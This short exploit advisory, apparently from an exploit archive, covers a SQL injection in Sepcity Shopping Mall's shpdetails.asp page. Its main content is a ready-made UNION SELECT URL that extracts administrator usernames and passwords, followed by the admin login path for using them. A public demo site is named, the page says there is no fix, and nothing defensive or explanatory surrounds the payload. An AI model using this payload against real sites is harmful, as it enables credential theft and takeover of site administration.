Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability

2008-12-29 18:04:17

#By Osmanizim
#Security Specialist
#Contacts > :( www.osmanizim.com
#Title: Shopping Mall <= SQL Injection Vulnerability.
#Demo : http://freeasp.sepcity.com/shopmall/default.asp



// Exploit -->


http://localhost/shopmall/shpdetails.asp?ID=1 union select 0,1,2,username,password,5,6,7,8,9 from administrators




// Admin -->


http://localhost/shopmall/admlogin.asp?

#

Fixes

No fixes

In order to submit a new fix you need to be registered.